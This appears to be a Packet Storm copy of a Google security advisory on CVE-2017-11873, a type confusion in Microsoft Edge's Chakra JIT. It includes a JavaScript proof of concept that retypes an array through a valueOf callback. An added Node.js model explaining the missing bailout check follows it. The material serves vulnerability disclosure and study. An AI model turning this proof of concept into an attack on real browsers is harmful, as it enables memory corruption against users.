Microsoft Edge Chakra JIT Bailout Generation

2017-11-16T00:00:00
ID PACKETSTORM:145010
Type packetstorm
Reporter Google Security Research
Modified 2017-11-16T00:00:00

Description

                                        
Microsoft Edge: Chakra: JIT: Bailouts must be generated for OP_Memset

CVE-2017-11873
  
  
    function opt(a, b, v) {
        if (b.length < 1)
            return;

        for (let i = 0; i < a.length; i++)
            a[i] = v;

        b[0] = 2.3023e-320;
    }
  
The above JavaScript code is JITed as follows:

    ... CHECKING THE TYPE OF B ...
    OP_Memset(a, v, a.length);
    b[0] = 2.3023e-320;
  
But there are no ImplicitCallFlags checks around OP_Memset, so the JITed code fails to detect that the type of "b" was changed while OP_Memset ran (converting "v" to a number can call a user-defined valueOf, which may run arbitrary JavaScript).

The PoC below shows that this can result in type confusion.
  
PoC:

    function opt(a, b, v) {
        if (b.length < 1)
            return;

        for (let i = 0; i < a.length; i++)
            a[i] = v;

        b[0] = 2.3023e-320;
    }

    function main() {
        // Warm up so opt() gets JIT-compiled with the loop lowered to OP_Memset
        for (let i = 0; i < 1000; i++) {
            opt(new Uint8Array(100), [1.1, 2.2, 3.3], {});
        }

        let a = new Uint8Array(100);
        let b = [1.1, 2.2, 3.3];
        // Storing v into the Uint8Array converts it to a number, which calls
        // valueOf; that call turns b from a float array into a var array while
        // the JITed code still assumes the type it checked earlier
        opt(a, b, {
            valueOf: () => {
                b[0] = {};
                return 0;
            }
        });

        // print() is provided by the ChakraCore test host (ch)
        print(b[0]);
    }

    main();
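As an added illustration, not code from the report or from Chakra, the following Node.js model shows what an ImplicitCallFlags check around OP_Memset buys. runtime.implicitCall, makeSideEffectValue, isFloatArray and runOpt are invented stand-ins for the engine's flag, the PoC's valueOf and the JIT's type assumption about b; Uint8Array.prototype.fill stands in for OP_Memset.

```javascript
// Added model (not Chakra's or the report's code): `runtime.implicitCall` stands in
// for the engine's ImplicitCallFlags, Uint8Array.prototype.fill for OP_Memset.
const runtime = { implicitCall: false };

// Like the PoC's v: converting it to a number runs user code that retypes `target`.
function makeSideEffectValue(target) {
  return {
    valueOf() {
      runtime.implicitCall = true; // the engine records an implicit call here
      target[0] = {};              // float array -> var array
      return 0;
    },
  };
}

// The "type of b" the JIT assumes: every element is a double.
function isFloatArray(arr) {
  return arr.every((x) => typeof x === 'number');
}

// Models the JITed opt(): type check of b, OP_Memset, specialized store into b.
// With checkImplicitCalls=false it behaves like the vulnerable code.
function runOpt(a, b, v, checkImplicitCalls) {
  if (b.length < 1) return { path: 'early-return', staleTypeAtStore: false };
  const assumedFloat = isFloatArray(b); // checked once, before the memset
  runtime.implicitCall = false;
  a.fill(v);                             // OP_Memset: ToNumber(v) may call valueOf
  if (checkImplicitCalls && runtime.implicitCall) {
    // The missing bailout: user code ran, so re-enter the interpreter and
    // redo the type check instead of trusting the stale one.
    return { path: 'bailout', staleTypeAtStore: false };
  }
  // Specialized store of a raw double; only sound if b is still a float array.
  const staleTypeAtStore = assumedFloat && !isFloatArray(b);
  b[0] = 2.3023e-320;
  return { path: 'fast-path', staleTypeAtStore };
}

// Runs the PoC's scenario both ways and reports which path each took.
function demo() {
  const b1 = [1.1, 2.2, 3.3];
  const unchecked = runOpt(new Uint8Array(100), b1, makeSideEffectValue(b1), false);
  const b2 = [1.1, 2.2, 3.3];
  const checked = runOpt(new Uint8Array(100), b2, makeSideEffectValue(b2), true);
  return { unchecked, checked };
}

console.log(demo());
```

In the unchecked run the store executes while the type assumption about b is already stale, which is the condition the real JIT turned into a type confusion; with the check it bails out before the store.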
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
  
  
  
  
Found by: lokihardt